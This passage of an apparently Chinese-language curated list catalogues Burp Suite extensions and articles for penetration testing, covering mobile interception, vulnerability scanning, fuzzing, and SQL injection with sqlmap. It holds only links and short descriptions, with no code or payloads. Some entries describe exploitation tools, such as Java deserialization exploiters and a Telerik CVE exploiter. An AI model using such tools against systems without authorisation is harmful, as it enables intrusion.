Store](https://parsiya.net/blog/2016-02-21-installing-burp-certificate-authority-in-windows-certificate-store/) *** ## <a id="eb7c3e91b47aa256099b0852c9afbde6"></a>Linux ### <a id="9c64f16ea0f54acd36e29cc7386b5d8f"></a>文章 - 2018.03 [nviso] [Intercepting Belgian eID (PKCS#11) traffic with Burp Suite on OS X / Kali / Windows](https://blog.nviso.be/2018/03/05/intercepting-belgian-eid-pkcs11-traffic-with-burp-suite-on-os-x-kali-windows/) *** ## <a id="d0e1003a674df5e0637b28aff2f7d675"></a>Apple ### <a id="515f7520ec815ac5d2117a6bc3cc7151"></a>文章 - 2018.03 [nviso] [Intercepting Belgian eID (PKCS#11) traffic with Burp Suite on OS X / Kali / Windows](https://blog.nviso.be/2018/03/05/intercepting-belgian-eid-pkcs11-traffic-with-burp-suite-on-os-x-kali-windows/) - 2016.08 [bogner] [Burp.app – Making Burp a little more OS X like](https://bogner.sh/2016/08/burp-app-making-burp-a-bit-more-os-x-like/) - 2015.12 [nabla] [Burp and iOS 9 App Transport Security](https://nabla-c0d3.github.io/blog/2015/12/01/burp-ios9-ats/) - 2014.08 [appsecconsulting] [Running Stubborn Devices Through Burp Suite via OSX Mountain Lion and Above](https://appsecconsulting.com/blog/running-stubborn-devices-through-burp-suite-via-osx-mountain-lion-and-above) *** ## <a id="33431f1a7baa0f6193334ef4d74ff82c"></a>Android ### <a id="d155578c9e4dea24eae19774031650dd"></a>工具 - [**282**星][3y] [Java] [mateuszk87/badintent](https://github.com/mateuszk87/badintent) Intercept, modify, repeat and attack Android's Binder transactions using Burp Suite - [**12**星][21d] [JS] [shahidcodes/android-nougat-ssl-intercept](https://github.com/shahidcodes/android-nougat-ssl-intercept) It decompiles target apk and adds security exception to accept all certificates thus making able to work with Burp/Charles and Other Tools ### <a id="b49c9aa9af355ca85cec2125fe9da5ec"></a>文章 - 2019.06 [bugbountywriteup] [Digging Android Applications — Part 1 — Drozer + Burp](https://medium.com/p/4fd4730d1cf2) - 2018.12 [doyler] [Proxy Android Apps through Burp for Mobile Assessments](https://www.doyler.net/security-not-included/proxy-android-apps-through-burp) - 2018.01 [nviso] [结合使用 Burp 与自定义 rootCA 来探查 Android N 网络流量](https://blog.nviso.be/2018/01/31/using-a-custom-root-ca-with-burp-for-inspecting-android-n-traffic/) - 2018.01 [freebuf] [如何在Android Nougat中正确配置Burp Suite?](http://www.freebuf.com/articles/network/160900.html) - 2018.01 [ropnop] [Configuring Burp Suite with Android Nougat](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/) - 2017.12 [aliyun] [安卓脱壳&&协议分析&&Burp辅助分析插件编写](https://xz.aliyun.com/t/1805) - 2016.11 [nxadmin] [Burpsuite抓包Android模拟器(AVD)设置](http://www.nxadmin.com/mobile-sec/1511.html) - 2014.01 [nvisium] [Android Assessments with GenyMotion + Burp](https://nvisium.com/blog/2014/01/24/android-assessments-with-genymotion-burp/) - 2012.08 [freebuf] [Burp Suite V1.4.12发布: 新增破解Android SSL功能](http://www.freebuf.com/sectool/5347.html) - 2012.08 [toolswatch] [Burp Suite v1.4.12 in the wild with the support of Android SSL Analysis](http://www.toolswatch.org/2012/08/burp-suite-v1-4-12-in-the-wild-with-the-support-of-android-ssl-analysis/) *** ## <a id="522d64730a37c1a8d0168f10f8d47bda"></a>Cloud ### <a id="285c52a4e04dd2f86646c8e1235c9332"></a>工具 - [**293**星][9d] [Py] [rhinosecuritylabs/iprotate_burp_extension](https://github.com/rhinosecuritylabs/iprotate_burp_extension) Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request. - [**178**星][2y] [Py] [virtuesecurity/aws-extender](https://github.com/virtuesecurity/aws-extender) a Burp plugin to assess permissions of cloud storage containers on AWS, Google Cloud and Azure. - [**47**星][3m] [Java] [netspi/awssigner](https://github.com/netspi/awssigner) Burp Extension for AWS Signing # <a id="90339d9a130e105e1617bff2c2ca9721"></a>漏洞 *** ## <a id="b6b5b261338c5d44d981bc9f239219f2"></a>工具 - [**691**星][11m] [Java] [vulnerscom/burp-vulners-scanner](https://github.com/vulnerscom/burp-vulners-scanner) Burp扫描插件,基于vulners.com搜索API - [**401**星][2y] [Java] [federicodotta/java-deserialization-scanner](https://github.com/federicodotta/java-deserialization-scanner) All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities - [**140**星][2m] [JS] [h3xstream/burp-retire-js](https://github.com/h3xstream/burp-retire-js) Burp/ZAP/Maven extension that integrate Retire.js repository to find vulnerable Javascript libraries. - [**131**星][2y] [Java] [yandex/burp-molly-scanner](https://github.com/yandex/burp-molly-scanner) Turn your Burp suite into headless active web application vulnerability scanner - [**104**星][6m] [Py] [kapytein/jsonp](https://github.com/kapytein/jsonp) a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies. - [**104**星][2y] [Java] [spiderlabs/airachnid-burp-extension](https://github.com/spiderlabs/airachnid-burp-extension) A Burp Extension to test applications for vulnerability to the Web Cache Deception attack - [**81**星][10m] [Py] [nccgroup/argumentinjectionhammer](https://github.com/nccgroup/argumentinjectionhammer) A Burp Extension designed to identify argument injection vulnerabilities. - [**75**星][4y] [Java] [directdefense/superserial](https://github.com/directdefense/superserial) SuperSerial - Burp Java Deserialization Vulnerability Identification - [**74**星][5y] [Py] [integrissecurity/carbonator](https://github.com/integrissecurity/carbonator) The Burp Suite Pro extension that automates scope, spider & scan from the command line. - [**65**星][2y] [Py] [capt-meelo/telewreck](https://github.com/capt-meelo/telewreck) A Burp extension to detect and exploit versions of Telerik Web UI vulnerable to CVE-2017-9248. - [**59**星][3y] [Java] [vulnerscom/burp-dirbuster](https://github.com/vulnerscom/burp-dirbuster) Dirbuster plugin for Burp Suite - [**57**星][3y] [Java] [linkedin/sometime](https://github.com/linkedin/sometime) A BurpSuite plugin to detect Same Origin Method Execution vulnerabilities - [**56**星][2y] [Java] [bigsizeme/burplugin-java-rce](https://github.com/bigsizeme/burplugin-java-rce) Burp plugin, Java RCE - [**47**星][2y] [Java] [portswigger/httpoxy-scanner](https://github.com/portswigger/httpoxy-scanner) A Burp Suite extension that checks for the HTTPoxy vulnerability. - [**39**星][3y] [Java] [directdefense/superserial-active](https://github.com/directdefense/superserial-active) SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender - [**35**星][3y] [Py] [thomaspatzke/burp-sessionauthtool](https://github.com/thomaspatzke/burp-sessionauthtool) Burp plugin which supports in finding privilege escalation vulnerabilities - [**30**星][29d] [Py] [portswigger/wordpress-scanner](https://github.com/portswigger/wordpress-scanner) Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy. WPScan like plugin for Burp. - [**25**星][3y] [Java] [vankyver/burp-vulners-scanner](https://github.com/vankyver/burp-vulners-scanner) Burp scanner plugin based on Vulners.com vulnerability database - [**23**星][3y] [Java] [vah13/burpcrlfplugin](https://github.com/vah13/burpcrlfplugin) Another plugin for CRLF vulnerability detection - [**11**星][10d] [Java] [codewatchorg/burp-indicatorsofvulnerability](https://github.com/codewatchorg/burp-indicatorsofvulnerability) Burp extension that checks application requests and responses for indicators of vulnerability or targets for attack - [**4**星][2y] [Java] [codedx/burp-extension](https://github.com/codedx/burp-extension) Burp Suite plugin to send data to Code Dx software vulnerability management system - [**2**星][1y] [Java] [moeinfatehi/cvss_calculator](https://github.com/moeinfatehi/cvss_calculator) CVSS Calculator - a burp suite extension for calculating CVSS v2 and v3 scores of vulnerabilities. - [**2**星][4y] [Java] [thec00n/dradis-vuln-table](https://github.com/thec00n/dradis-vuln-table) Dradis Vuln Table extension for Burp suite - [**1**星][2y] [Java] [rammarj/burp-header-injector](https://github.com/rammarj/burp-header-injector) Burp Free plugin to test for host header injection vulnerabilities. (Development) *** ## <a id="9911c92a9ef03bfabe247b62b5340d8c"></a>文章 - 2020.01 [freebuf] [挖洞经验 | 用BurpSuite实现越权漏洞(IDOR)的自动发现识别](https://www.freebuf.com/vuls/225701.html) - 2019.03 [int0x33] [Day 82: Hunting for Vulnerabilities in Android Apps with Burp and APK Tools](https://medium.com/p/8b84bc189603) - 2019.01 [sans] [Extending Burp to Find Struts and XXE Vulnerabilities](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1542133744.pdf) - 2018.09 [4hou] [使用Burp和Ysoserial实现Java反序列化漏洞的盲利用](http://www.4hou.com/technology/13440.html) - 2018.05 [thief] [burpsuite插件开发之检测越权访问漏洞](https://thief.one/2018/05/04/1/) - 2018.01 [security] [Burp WP - Find vulnerabilities in WordPress using Burp](https://security.szurek.pl/burp-wp-find-vulnerabilities-in-wordpress-using-burp.html) - 2017.12 [avleonov] [Vulners.com vulnerability detection plugins for Burp Suite and Google Chrome](https://avleonov.com/2017/12/10/vulners-com-vulnerability-detection-plugins-for-burp-suite-and-google-chrome/) - 2017.09 [aliyun] [请问能burpsuite的插件中直接获取到直接获取到漏洞报告吗?](https://xz.aliyun.com/t/1018) - 2017.08 [freebuf] [HUNT:一款可提升漏洞扫描能力的BurpSuite漏洞扫描插件](http://www.freebuf.com/sectool/143182.html) - 2017.07 [freebuf] [Burp Suite扫描器漏洞扫描功能介绍及简单教程](http://www.freebuf.com/sectool/141435.html) - 2017.07 [hackingarticles] [Vulnerability Analysis in Web Application using Burp Scanner](http://www.hackingarticles.in/vulnerability-analysis-web-application-using-burp-scanner/) - 2017.07 [vulners] [2 years of Vulners and new plugin for Burp Scanner](https://blogvulners.wordpress.com/2017/07/07/2-years-of-vulners-and-new-plugin-for-burp-scanner/) - 2017.06 [4hou] [使用 Burp Infiltrator 进行漏洞挖掘](http://www.4hou.com/tools/5815.html) - 2017.06 [4hou] [将Burp Scanner漏洞结果转换为Splunk事件](http://www.4hou.com/technology/5703.html) - 2017.02 [HackingMonks] [Website Vulnerability Scanning Burp Suite in Kali Linux](https://www.youtube.com/watch?v=nFSQZ0KuCqw) - 2015.12 [mediaservice] [Scanning for Java Deserialization Vulnerabilities in web applications with Burp Suite](https://techblog.mediaservice.net/2015/12/scanning-for-java-deserialization-vulnerabilities-in-web-applications-with-burp-suite/) - 2015.08 [freebuf] [本地文件包含漏洞检测工具 – Burp国产插件LFI scanner checks](http://www.freebuf.com/sectool/75118.html) - 2013.08 [freebuf] [BurpSuite权限提升漏洞检测插件——The Burp SessionAuth](http://www.freebuf.com/sectool/11905.html) - 2013.08 [toolswatch] [The Burp SessionAuth – Extension for Detection of Possible Privilege escalation vulnerabilities](http://www.toolswatch.org/2013/08/the-burp-sessionauth-extension-for-detection-of-possible-privilege-escalation-vulnerabilities/) # <a id="663be1fd064aa42654f48bae1e1e1503"></a>扫描 *** ## <a id="3d61290c2dab36e7b8e2a1538c60df6b"></a>工具 - [**553**星][4m] [Java] [wagiro/burpbounty](https://github.com/wagiro/burpbounty) is a extension of Burp Suite to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface. - [**449**星][8m] [Py] [albinowax/activescanplusplus](https://github.com/albinowax/activescanplusplus) ActiveScan++ Burp Suite Plugin - [**308**星][10d] [Java] [c0ny1/passive-scan-client](https://github.com/c0ny1/passive-scan-client) Burp被动扫描流量转发插件 - [**253**星][11d] [Py] [initroot/burpjslinkfinder](https://github.com/initroot/burpjslinkfinder) Burp Extension for a passive scanning JS files for endpoint links. - [**231**星][8m] [Perl] [modzero/mod0burpuploadscanner](https://github.com/modzero/mod0burpuploadscanner) HTTP file upload scanner for Burp Proxy - [**189**星][15d] [Perl] [portswigger/upload-scanner](https://github.com/portswigger/upload-scanner) HTTP file upload scanner for Burp Proxy - [**42**星][2y] [Py] [modzero/interestingfilescanner](https://github.com/modzero/interestingfilescanner) Burp extension to scans for interesting files and directories - [**40**星][1y] [Py] [luh2/detectdynamicjs](https://github.com/luh2/detectdynamicjs) Burp Extension provides an additional passive scanner that tries to find differing content in JavaScript files and aid in finding user/session data. - [**37**星][1y] [Java] [augustd/burp-suite-error-message-checks](https://github.com/augustd/burp-suite-error-message-checks) Burp Suite extension to passively scan for applications revealing server error messages - [**36**星][5m] [Py] [arbazkiraak/burpblh](https://github.com/arbazkiraak/burpblh) 使用IScannerCheck发现被劫持的损坏链接. Burp插件 - [**35**星][8m] [Py] [portswigger/active-scan-plus-plus](https://github.com/portswigger/active-scan-plus-plus) ActiveScan++ Burp Suite Plugin - [**34**星][4y] [Py] [politoinc/yara-scanner](https://github.com/politoinc/yara-scanner) Yara intergrated into BurpSuite - [**34**星][6m] [Py] [portswigger/js-link-finder](https://github.com/portswigger/js-link-finder) Burp Extension for a passive scanning JS files for endpoint links. - [**30**星][24d] [Java] [portswigger/scan-check-builder](https://github.com/portswigger/scan-check-builder) a extension of Burp Suite that improve an active and passive scanner by yourself. This extension requires Burp Suite Pro. - [**27**星][6y] [Py] [opensecurityresearch/custompassivescanner](https://github.com/opensecurityresearch/custompassivescanner) A Custom Scanner for Burp - [**27**星][4m] [Java] [mirfansulaiman/customheader](https://github.com/mirfansulaiman/customheader) This Burp Suite extension allows you to customize header with put a new header into HTTP REQUEST BurpSuite (Scanner, Intruder, Repeater, Proxy History) - [**24**星][3y] [Py] [silentsignal/activescan3plus](https://github.com/silentsignal/activescan3plus) Modified version of ActiveScan++ Burp Suite extension - [**23**星][11m] [BitBake] [ghsec/bbprofiles](https://github.com/ghsec/bbprofiles) a extension of Burp Suite that improve an active and passive scanner by yourself - [**21**星][2y] [Py] [unamer/ctfhelper](https://github.com/unamer/ctfhelper) A simple Burp extension for scanning stuffs in CTF - [**21**星][4y] [Py] [f-secure/headless-scanner-driver](https://github.com/f-secure/headless-scanner-driver) A Burp Suite extension that starts scanning on requests it sees, and dumps results on standard output - [**20**星][5m] [Java] [aress31/flarequench](https://github.com/aress31/flarequench) Burp Suite plugin that adds additional checks to the passive scanner to reveal the origin IP(s) of Cloudflare-protected web applications. - [**19**星][8m] [Java] [thomashartm/burp-aem-scanner](https://github.com/thomashartm/burp-aem-scanner) Burp Scanner extension to fingerprint and actively scan instances of the Adobe Experience Manager CMS. It checks the website for common misconfigurations and security holes. - [**18**星][9d] [Java] [augustd/burp-suite-software-version-checks](https://github.com/augustd/burp-suite-software-version-checks) Burp extension to passively scan for applications revealing software version numbers - [**18**星][4y] [codewatchorg/burp-yara-rules](https://github.com/codewatchorg/burp-yara-rules) Yara rules to be used with the Burp Yara-Scanner extension - [**18**星][2m] [BitBake] [sy3omda/burp-bounty](https://github.com/sy3omda/burp-bounty) is extension of Burp Suite that improve Burp scanner. - [**13**星][11m] [Py] [thomaspatzke/burp-missingscannerchecks](https://github.com/thomaspatzke/burp-missingscannerchecks) Collection of scanner checks missing in Burp - [**10**星][4y] [Java] [augustd/burp-suite-token-fetcher](https://github.com/augustd/burp-suite-token-fetcher) Burp Extender to add unique form tokens to scanner requests. - [**10**星][2y] [Java] [securifybv/phpunserializecheck](https://github.com/securifybv/phpunserializecheck) PHP Unserialize Check - Burp Scanner Extension - [**10**星][2m] [Java] [veggiespam/imagelocationscanner](https://github.com/veggiespam/imagelocationscanner) Scan for GPS location exposure in images with this Burp & ZAP plugin. - [**7**星][3y] [Py] [luh2/pdfmetadata](https://github.com/luh2/pdfmetadata) The PDF Metadata Burp Extension provides an additional passive Scanner check for metadata in PDF files. - [**7**星][23d] [Java] [parsiya/bug-diaries](https://github.com/parsiya/bug-diaries) A extension for Burp's free edition that mimics the pro edition's custom scan issues. - [**5**星][4y] [Java] [eganist/burp-issue-poster](https://github.com/eganist/burp-issue-poster) This Burp Extension is intended to post to a service the details of an issue found either by active or passive scanning - [**4**星][4y] [Ruby] [blazeinfosec/activeevent](https://github.com/blazeinfosec/activeevent) ActiveEvent is a Burp plugin that integrates Burp Scanner and Splunk events - [**3**星][2y] [Java] [alexlauerman/incrementmeplease](https://github.com/alexlauerman/incrementmeplease) Burp extension to increment a parameter in each active scan request - [**2**星][5y] [Shell] [evilpacket/bower-burp-static-analysis](https://github.com/evilpacket/bower-burp-static-analysis) Nov 2014 scan of bower using burp suite static analysis engine - [**2**星][10m] [Py] [jamesm0rr1s/burpsuite-add-and-track-custom-issues](https://github.com/jamesm0rr1s/BurpSuite-Add-and-Track-Custom-Issues) Add & Track Custom Issues is a Burp Suite extension that allows users to add and track manual findings that the automated scanner was unable to identify. - [**1**星][8m] [Java] [bort-millipede/burp-batch-report-generator](https://github.com/bort-millipede/burp-batch-report-generator) Small Burp Suite Extension to generate multiple scan reports by host with just a few clicks. Works with Burp Suite Professional only. - [**1**星][1y] [Java] [logicaltrust/burpexiftoolscanner](https://github.com/logicaltrust/burpexiftoolscanner) Burp extension, reads metadata using ExifTool - [**1**星][2y] [Java] [moradotai/cms-scan](https://github.com/moradotai/cms-scan) An active scan extension for Burp that provides supplemental coverage when testing popular content management systems. - [**0**星][11m] [Java] [xorrbit/burp-nessusloader](https://github.com/xorrbit/burp-nessusloader) Burp Suite extension to import detected web servers from a Nessus scan xml file (.nessus) *** ## <a id="cf39c6ab3dcf02fdcf86dc43c77be5d6"></a>文章 - 2019.10 [trustfoundry] [Scanning At Scale: Burp Suite Enterprise Edition](https://trustfoundry.net/scanning-at-scale-burp-suite-enterprise-edition/) - 2019.05 [web] [Scanning TLS Server Configurations with Burp Suite](https://web-in-security.blogspot.com/2019/05/scanning-tls-server-configurations-with.html) - 2018.08 [jerrygamblin] [Bulk Bug Bounty Scanning With The Burp 2.0 API](https://jerrygamblin.com/2018/08/30/bulk-bug-bounty-scanning-with-the-burp-2-0-api/) - 2018.02 [ZeroNights] [[Defensive Track]Eldar Zaitov, Andrey Abakumov - Automation of Web Application Scanning With Burp](https://www.youtube.com/watch?v=pQ4v4H7bHLE) - 2017.08 [360] [Burp Suite扩展之Java-Deserialization-Scanner](https://www.anquanke.com/post/id/86594/) - 2017.07 [intrinsec] [Burp extension « Scan manual insertion point »](https://securite.intrinsec.com/2017/07/03/burp-extension-scan-manual-insertion-point/) - 2017.05 [moxia] [【技术分享】Burp Suite扩展开发之Shodan扫描器(已开源)](http://www.moxia.org/Blog.php/index.php/archives/214) - 2016.12 [360] [Burp Suite扩展开发之Shodan扫描器(已开源)](https://www.anquanke.com/post/id/85209/) - 2016.11 [jerrygamblin] [Automated Burp Suite Scanning and Reporting To Slack.](https://jerrygamblin.com/2016/11/12/automated-burp-suite-scanning-and-reporting-to-slack/) - 2016.04 [freebuf] [针对非Webapp测试的Burp技巧(二):扫描、重放](http://www.freebuf.com/articles/web/100875.html) - 2016.03 [parsiya] [Thick Client Proxying - Part 2: Burp History, Intruder, Scanner and More](https://parsiya.net/blog/2016-03-29-thick-client-proxying---part-2-burp-history-intruder-scanner-and-more/) - 2016.03 [parsiya] [Thick Client Proxying - Part 2: Burp History, Intruder, Scanner and More](https://parsiya.net/blog/2016-03-29-thick-client-proxying-part-2-burp-history-intruder-scanner-and-more/) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 06 - Sequencer and Scanner](https://www.youtube.com/watch?v=G-v581pXerE) - 2015.10 [freebuf] [J2EEScan:J2EE安全扫描(Burp插件)](http://www.freebuf.com/sectool/80535.html) - 2012.12 [portswigger] [Sample Burp Suite extension: custom scanner checks | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-scanner-checks) - 2012.12 [portswigger] [Sample Burp Suite extension: custom scan insertion points | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-scan-insertion-points) # <a id="e9a969fc073afb5add0b75607e43def0"></a>Fuzz *** ## <a id="3cb057fb3f3cdaca2fc0ac0c8e87be2c"></a>工具 - [**211**星][5m] [Java] [h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) ZAP/Burp plugin that generate script to reproduce a specific HTTP request (Intended for fuzzing or scripted attacks) - [**63**星][7m] [Py] [pinnace/burp-jwt-fuzzhelper-extension](https://github.com/pinnace/burp-jwt-fuzzhelper-extension) Burp扩展, 用于Fuzzing JWT - [**55**星][3y] [Py] [mseclab/burp-pyjfuzz](https://github.com/mseclab/burp-pyjfuzz) Burp Suite plugin which implement PyJFuzz for fuzzing web application. - [**42**星][3y] [team-firebugs/burp-lfi-tests](https://github.com/team-firebugs/burp-lfi-tests) Fuzzing for LFI using Burpsuite - [**28**星][3y] [Py] [floyd-fuh/burp-httpfuzzer](https://github.com/floyd-fuh/burp-httpfuzzer) Burp plugin to do random fuzzing of HTTP requests - [**24**星][23d] [Py] [jiangsir404/xss-sql-fuzz](https://github.com/jiangsir404/xss-sql-fuzz) burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz - 重复区段: [平台->Web->XSS->工具](#73a4242179040ad255b6c99f75b0206d) |[SQL->工具](#b90695c04ef9e0a788a2aa07dec6f2b5) | - [**21**星][7y] [raz0r/burp-radamsa](https://github.com/raz0r/burp-radamsa) Radamsa fuzzer extension for Burp Suite - [**18**星][1y] [Py] [mgeeky/burpcontextawarefuzzer](https://github.com/mgeeky/burpcontextawarefuzzer) BurpSuite's payload-generation extension aiming at applying fuzzed test-cases depending on the type of payload (integer, string, path; JSON; XML; GWT; binary) and following encoding-scheme applied originally. - [**6**星][29d] [Java] [nscuro/bradamsa-ng](https://github.com/nscuro/bradamsa-ng) Burp Suite extension for Radamsa-powered fuzzing with Intruder - [**4**星][2y] [Java] [huvuqu/fuzz18plus](https://github.com/huvuqu/fuzz18plus) Advance of fuzzing for Web pentest. Based on Burp extension, send HTTP request template out to Python fuzzer. - [**1**星][7m] [Kotlin] [gosecure/burp-fuzzy-encoding-generator](https://github.com/gosecure/burp-fuzzy-encoding-generator) Quickly test various encoding for a given value in Burp Intruder *** ## <a id="92225012d124990c0f3e4c317c9603d4"></a>文章 - 2018.11 [d0znpp] [Extending fuzzing with Burp by FAST](https://medium.com/p/f67d8b5d63e7) - 2017.09 [4hou] [利用Burp“宏”解决自动化 web fuzzer的登录问题](http://www.4hou.com/web/7542.html) - 2017.09 [360] [如何使用Burp Suite Macros绕过防护进行自动化fuzz测试](https://www.anquanke.com/post/id/86768/) - 2017.09 [securelayer7] [使用 Burp 的宏功能,实现 WebApp 输入 Fuzzing 的自动化](http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/) - 2017.09 [securelayer7] [Automating Web Apps Input fuzzing via Burp Macros](https://blog.securelayer7.org/automating-web-apps-input-fuzzing-via-burp-macros/) - 2016.10 [code610] [HTTP Server fuzzing with Burp](https://code610.blogspot.com/2016/10/http-server-fuzzing-with-burp.html) - 2013.10 [debasish] [Fuzzing Facebook for $$$ using Burpy](http://www.debasish.in/2013/10/fuzzing-facebook-for-using-burpy.html) - 2013.06 [raz0r] [Radamsa Fuzzer Extension for Burp Suite](https://raz0r.name/releases/burp-radamsa/) - 2012.11 [freebuf] [渗透测试神器Burp弹药扩充-fuzzdb](http://www.freebuf.com/sectool/6181.html) - 2010.09 [netspi] [Fuzzing Parameters in CSRF Resistant Applications with Burp Proxy](https://blog.netspi.com/fuzzing-parameters-in-csrf-resistant-applications-with-burp-proxy/) # <a id="0481f52a7f7ee969fa5834227e49412e"></a>SQL *** ## <a id="b90695c04ef9e0a788a2aa07dec6f2b5"></a>工具 - [**393**星][2y] [Py] [rhinosecuritylabs/sleuthql](https://github.com/rhinosecuritylabs/sleuthql) Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap. - [**237**星][2y] [Java] [difcareer/sqlmap4burp](https://github.com/difcareer/sqlmap4burp) sqlmap embed in burpsuite - [**186**星][4m] [Py] [codewatchorg/sqlipy](https://github.com/codewatchorg/sqlipy) Burp Suite 插件, 使用 SQLMap API 集成SQLMap - [**156**星][2m] [trietptm/sql-injection-payloads](https://github.com/trietptm/sql-injection-payloads) SQL Injection Payloads for Burp Suite, OWASP Zed Attack Proxy,... - 重复区段: [Payload->工具](#aa76bde443edd8ef5b7af7e0fcab354e) | - [**120**星][12d] [Java] [c0ny1/sqlmap4burp-plus-plus](https://github.com/c0ny1/sqlmap4burp-plus-plus) 一款兼容Windows,mac,linux多个系统平台的Burp与sqlmap联动插件 - [**24**星][23d] [Py] [jiangsir404/xss-sql-fuzz](https://github.com/jiangsir404/xss-sql-fuzz) burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz - 重复区段: [平台->Web->XSS->工具](#73a4242179040ad255b6c99f75b0206d) |[Fuzz->工具](#3cb057fb3f3cdaca2fc0ac0c8e87be2c) | - [**24**星][3m] [Py] [portswigger/sqli-py](https://github.com/portswigger/sqli-py) a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API. - [**22**星][8y] [Py] [milo2012/burpsql](https://github.com/milo2012/burpsql) Automating SQL injection using Burp Proxy Logs and SQLMap - [**9**星][1m] [Py] [orleven/burpcollect](https://github.com/orleven/burpcollect) 基于BurpCollector的二次开发, 记录Burpsuite Site Map记录的里的数据包中的目录路径参数名信息,并存入Sqlite,并可导出txt文件。 - [**0**星][3y] [Java] [silentsignal/burp-sqlite-logger](https://github.com/silentsignal/burp-sqlite-logger) SQLite logger for Burp Suite - 重复区段: [日志->工具](#9522b6866834eb0ce3563b27921745a4) | *** ## <a id="3aad4ab885a1f2eb2a9feab0506a5d6c"></a>文章 - 2019.08 [nviso] [Using Burp’s session Handling Rules to insert authorization cookies into Intruder, Repeater and even sqlmap](https://blog.nviso.be/2019/08/29/using-burps-session-handling-rules-to-insert-authorization-cookies-into-intruderrepeater-and-even-sqlmap/) - 2018.11 [pediy] [[原创]利用BurpSuite到SQLMap批量测试SQL注入](https://bbs.pediy.com/thread-247775.htm) - 2018.05 [freebuf] [Burpsuit结合SQLMapAPI产生的批量注入插件(X10)](http://www.freebuf.com/articles/web/171622.html) - 2018.05 [freebuf] [Burpsuit结合SQLMapAPI产生的批量注入插件](http://www.freebuf.com/articles/web/169727.html) - 2018.04 [valeriyshevchenko] [BurpSuit + SqlMap = One Love](https://medium.com/p/64451eb7b1e8) - 2018.04 [freebuf] [关于Sql注入以及Burpsuite Intruders使用的一些浅浅的见解](http://www.freebuf.com/news/166495.html) - 2017.08 [freebuf] [使用Burp和自定义Sqlmap Tamper利用二次注入漏洞](http://www.freebuf.com/articles/web/142963.html) - 2017.08 [4hou] [通过Burp以及自定义的Sqlmap Tamper进行二次SQL注入](http://www.4hou.com/system/6945.html) - 2017.08 [360] [如何借助Burp和SQLMap Tamper利用二次注入](https://www.anquanke.com/post/id/86551/) - 2017.08 [pentest] [使用 Burp 和自定义的Sqlmap Tamper 脚本实现 Second Order SQLi 漏洞利用](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) - 2017.03 [4hou] [利用Burp“宏”自动化另类 SQLi](http://www.4hou.com/technology/3664.html) - 2017.03 [freebuf] [Burpsuite+SQLMAP双璧合一绕过Token保护的应用进行注入攻击](http://www.freebuf.com/sectool/128589.html) - 2017.03 [360] [使用burp macros和sqlmap绕过csrf防护进行sql注入](https://www.anquanke.com/post/id/85593/) - 2017.01 [hackingarticles] [Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin)](http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin/) - 2017.01 [HackingMonks] [Burpsuite - 1 (SQL injection,intercepting)](https://www.youtube.com/watch?v=fqNgSip10Rw) - 2016.11 [360] [Burp Suite插件开发之SQL注入检测(已开源)](https://www.anquanke.com/post/id/84882/) - 2016.11 [vkremez] [Burp Suite and sqlmap](https://www.vkremez.com/2016/11/burp-suite-and-sqlmap.html) - 2016.05 [freebuf] [BurpSuite日志分析过滤工具,加快SqlMap进行批量扫描的速度](http://www.freebuf.com/sectool/104855.html) - 2016.03 [freebuf] [如何编写burpsuite联动sqlmap的插件](http://www.freebuf.com/sectool/100093.html) - 2014.09 [freebuf] [渗透神器合体:在BurpSuite中集成Sqlmap](http://www.freebuf.com/sectool/45239.html) - 2014.08 [nvisium] [iOS Assessments with Burp + iFunBox + SQLite](https://nvisium.com/blog/2014/08/06/ios-assessments-with-burp-ifunbox-sqlite/) - 2013.04 [pediy] [[原创]利用sqlmap和burpsuite绕过csrf token进行SQL注入](https://bbs.pediy.com/thread-168302.htm) - 2013.02 [pentestlab] [SQL Injection Authentication Bypass With Burp](https://pentestlab.blog/2013/02/25/sql-injection-authentication-bypass-with-burp/) - 2012.12 [freebuf] [Burpsuite sqlmap插件](http://www.freebuf.com/sectool/6426.html) - 2012.11 [freebuf] [Burp Suite—BLIND SQL INJECTION](http://www.freebuf.com/articles/web/6154.html) - 2012.10 [] [使用BurpSuite来进行sql注入](http://www.91ri.org/4415.html) - 2012.09 [freebuf] [BurpSuite教程与技巧之SQL Injection](http://www.freebuf.com/articles/5560.html) - 2012.06 [milo2012] [Automating SQL Injection with Burp, Sqlmap and GDS Burp API](https://milo2012.wordpress.com/2012/06/26/automating-sql-injection-with-burp-sqlmap-and-gds-burp-api/) - 2012.06 [websec] [Using Burp to exploit a Blind SQL Injection](https://websec.ca/blog/view/using-burp-to-exploit-blind-sql-injection) - 2012.05 [freebuf] [[技巧]使用Burpsuite辅助Sqlmap进行POST注入测试](http://www.freebuf.com/sectool/2311.html) - 2012.04 [firebitsbr] [Pentest tool: Gason: A plugin to run sqlmap into burpsuite.](https://firebitsbr.wordpress.com/2012/04/22/pentest-tool-gason-a-plugin-to-run-sqlmap-into-burpsuite/) - 2011.05 [console] [Web Hacking Video Series #1 Automating SQLi with Burp Extractor](http://console-cowboys.blogspot.com/2011/05/web-hacking-video-series-1-automating.html) - 2011.04 [depthsecurity] [Blind SQL Injection & BurpSuite - Like a Boss](https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss) # <a id="19f0f074fc013e6060e96568076b7c9a"></a>日志 *** ## <a id="9522b6866834eb0ce3563b27921745a4"></a>工具 - [**523**星][4m] [Py] 